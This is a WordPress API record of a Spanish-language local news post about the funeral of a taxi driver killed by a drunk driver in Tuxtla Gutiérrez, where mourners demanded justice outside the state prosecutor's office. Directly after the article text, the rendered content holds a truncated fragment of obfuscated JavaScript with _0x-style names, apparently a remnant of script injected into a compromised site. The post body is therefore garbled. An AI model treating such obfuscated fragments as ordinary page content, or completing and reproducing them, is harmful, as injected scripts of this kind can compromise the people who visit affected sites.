{"id":5905,"date":"2022-10-18T02:21:25","date_gmt":"2022-10-18T02:21:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5905"},"modified":"2022-10-18T02:21:26","modified_gmt":"2022-10-18T02:21:26","slug":"dan-el-ultimo-adios-a-taxista-que-murio-al-ser-embestido-en-su-unidad-por-una-camioneta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5905","title":{"rendered":"Dan el \u00faltimo adi\u00f3s a taxista que muri\u00f3 al ser embestido en su unidad por una camioneta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"627\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221017-WA0025.jpg\" alt=\"\" class=\"wp-image-5906\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221017-WA0025.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221017-WA0025-300x261.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 17 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Este lunes familiares, choferes y amigos despidieron a  Carlos, el conductor del taxi que perdi\u00f3 la vida el fin de semana luego de ser embestido en su unidad por el conductor de una camioneta que circulaba en sentido contrario y en estado de ebriedad.El cuerpo fue sacado de su domicilio localizado en la Colonia Patria Nueva con rumbo al Pante\u00f3n Jard\u00edn San Marcos de la Colonia Los P\u00e1jaros.El cuerpo iba escoltado por decenas de taxistas quienes pitaban y pintaron leyendas en los cristales de los carros   con la exigencia de justicia por este lamentable caso.El cortejo f\u00fanebre se detuvo a la altura de la Fiscal\u00eda General del Estado donde bajaron el cuerpo y lo colocaron en la explanada del acceso principal.En este punto los presentes exigieron justicia para &#8220;Cal\u00edn&#8221; y castigo al responsable de este terrible accidente que dej\u00f3 en la orfandad a una familia.Por ello, el llamado en\u00e9rgico a las autoridades para que est\u00e9 caso no quede impune.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 17 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Este lunes familiares, choferes y amigos despidieron a Carlos, el conductor del taxi que perdi\u00f3 la vida el fin de semana luego de ser embestido en su unidad por el conductor de una camioneta que circulaba en sentido contrario y en estado de ebriedad.El cuerpo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5906,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5905","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5905","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5905"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5905\/revisions"}],"predecessor-version":[{"id":5907,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5905\/revisions\/5907"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5906"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5905"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5905"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5905"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}